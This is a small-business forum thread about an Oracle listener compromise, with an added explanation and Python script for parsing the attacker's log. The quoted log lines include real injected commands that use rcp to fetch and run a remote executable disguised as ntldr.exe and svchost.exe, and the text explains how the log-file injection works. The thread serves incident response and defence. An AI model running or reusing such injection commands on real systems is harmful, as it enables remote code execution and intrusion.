DrayTek UK Users' Community Forum
Help, Advice and Solutions from DrayTek Users
Vigor 2600
- hot_dog
- Topic Author
03 Nov 2010 14:07 #64657
by hot_dog
Vigor 2600 was created by hot_dog
Hi. Can somebody tell me if it's possible to block certain IP addresses from accessing our network from the web.
It would appear we had a hack last night; it didn't do too much damage as far as we are aware, but they tried copying files from a server to ours.
I'm sure they'll be back to finish the job, so I want to stop these IP addresses using the firewall in the router.
Trouble is, is this router too old for things like this?
- lozstlouis
03 Nov 2010 14:30 #64663
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
These attacks on port 80? Or do you have some other means of entry?
- hot_dog
- Topic Author
03 Nov 2010 15:24 #64666
by hot_dog
Replied by hot_dog on topic Vigor 2600
Hi Lozstlouis,
How can I tell how they gained entry? It would appear they tried to copy a file over to an Oracle server by pretending to be a user. They managed to copy an ora.bat file into the Startup folder, then disabled the Oracle listener. Of course I restarted the server and the bat file was activated.
It would, however, appear that this bat file had failed to do its job, as the last command in the file was to delete the bat file, but it was still there after the reboot.
Contents of the file:
02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error
NL-00303: syntax error in NV string
I'm confused as to why port 80 is visible on the web, as nothing is being redirected and management from the internet is turned off. But according to Shields Up, it can see port 80 is open, along with ports 23, 25 and 143.
Now we do have a mail server running, so this could have something to do with the above, but I don't really know.
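The file contents quoted in the post above have the shape of an Oracle TNS listener log: a change to the listener's log_file parameter, followed by TNS-01153 errors that echo back whatever the client sent in its connect string. That is consistent with how a file called ora.bat ends up in the Startup folder without anyone copying it: the listener is told to write its log to that path, and every subsequent "error || command || error" string the attacker sends is logged verbatim, where cmd.exe later runs the command because "error" is not a recognised command and "||" executes the right-hand side on failure. The script below is an added example, not code from this thread or from DrayTek or Oracle. It assumes that reading of the file and parses the lines quoted in the post to extract the commands cmd.exe would run, the remote addresses those commands fetch from (the addresses the original poster wants to block at the router), and the local files they touch. The sample log embedded in it is constructed from the lines in the post so the script runs offline.

```python
import re
from dataclasses import dataclass

# Constructed sample: the file contents quoted in the post above, embedded
# here so the script runs offline (not a file retrieved from the server).
SAMPLE_LOG = r"""02-NOV-2010 22:13:11 * log_file * 0
02-NOV-2010 22:13:11 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 89.249.22.15.adm:/var/adm/.x/ka.exe c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\ntldr.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || rcp -b 140.117.31.8.adm:/var/adm/.x/ka.exe c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:12 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || c:\svchost.exe || error
NL-00303: syntax error in NV string
02-NOV-2010 22:13:13 * 1153
TNS-01153: Failed to process string: (CONNECT_DATA=((
error || del c:\Documents and Settings\All Users\Start Menu\Programs\Startup\ora.bat || error
NL-00303: syntax error in NV string
"""

# "DD-MON-YYYY HH:MM:SS * <event>" lines: parameter changes and error codes.
TS_RE = re.compile(r"^(\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* (.+)$")
# cmd.exe runs the right-hand side of "||" when the left side fails, and
# "error" is not a command, so "error || X || error" executes X and lets the
# surrounding log text fail harmlessly. Match exactly that shape.
INJECT_RE = re.compile(r"^error \|\| (.+?) \|\| error$")
IPV4_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
# A Windows path as cmd.exe tokenises it when unquoted: it ends at the
# first space, which is why "del c:\Documents and Settings\..." never
# reaches ora.bat.
WINPATH_RE = re.compile(r"[A-Za-z]:\\\S+")


@dataclass(frozen=True)
class Finding:
    timestamp: str   # time of the TNS-01153 error that echoed the string
    command: str     # what cmd.exe would execute from that log line


def parse_listener_log(text):
    """Return (times the log_file parameter changed, injected commands)."""
    lines = text.splitlines()
    changes, findings, last_ts = [], [], ""
    for i, line in enumerate(lines):
        m = TS_RE.match(line)
        if m:
            last_ts, event = m.groups()
            if event.startswith("log_file "):
                changes.append(last_ts)
            continue
        # The listener prints the connect string it could not parse on the
        # line after the TNS-01153 error.
        if line.startswith("TNS-01153:") and i + 1 < len(lines):
            inj = INJECT_RE.match(lines[i + 1].strip())
            if inj:
                findings.append(Finding(last_ts, inj.group(1)))
    return changes, findings


def remote_hosts(findings):
    """IPv4 addresses the injected commands pull files from."""
    hosts = set()
    for f in findings:
        hosts.update(IPV4_RE.findall(f.command))
    return hosts


def dropped_files(findings):
    """Local paths the injected commands write, run or try to delete."""
    paths = set()
    for f in findings:
        paths.update(WINPATH_RE.findall(f.command))
    return paths


def report(text):
    """Summary a responder can act on: block list, IOC paths, timeline."""
    changes, findings = parse_listener_log(text)
    return {
        "log_file_changed_at": changes,
        "injected_commands": [f.command for f in findings],
        "remote_hosts": sorted(remote_hosts(findings)),
        "dropped_files": sorted(dropped_files(findings)),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Two things the output makes visible. Windows rcp takes its remote side as host.user:path, so ".adm" is the remote user name and the two addresses in front of it are the hosts to block; the dropped-file list contains c:\ntldr.exe and c:\svchost.exe (names chosen to look like system files) plus a bare "c:\Documents", because the del command's path has spaces and no quotes, which matches the post's observation that ora.bat survived the reboot. Blocking two addresses at the router is worth doing but the same script can be pointed at the listener's real log and at listener.ora to confirm the log_file change was reverted, since the attacker can come back from any other address as long as port 1521 stays reachable.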
- lozstlouis
04 Nov 2010 10:12 #64685
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
Port scanner detected 80 (sure remote management is off?) Port 23 (telnet) 25 (SMTP) & 143 (IMAP). So ports 25 & 143 will be your mail server. What is Oracle doing outward facing? Remote users? What port?
- hot_dog
- Topic Author
04 Nov 2010 10:26 #64688
by hot_dog
Replied by hot_dog on topic Vigor 2600
Yes, remote management is off, tried a port scan again late last night and the only ports it found open this time were 23, 25 & 143.
I don't know why Oracle was outward facing, but it was on port 1521, which has now been removed, and which I'm now suspecting they used to connect to us.
There used to be remote users at one time......
- lozstlouis
04 Nov 2010 10:28 #64691
by lozstlouis
www.alits.co.uk
Replied by lozstlouis on topic Vigor 2600
Then that will probably slam the door shut on any foul play. What's the telnet port open for?
Copyright © 2024 DrayTek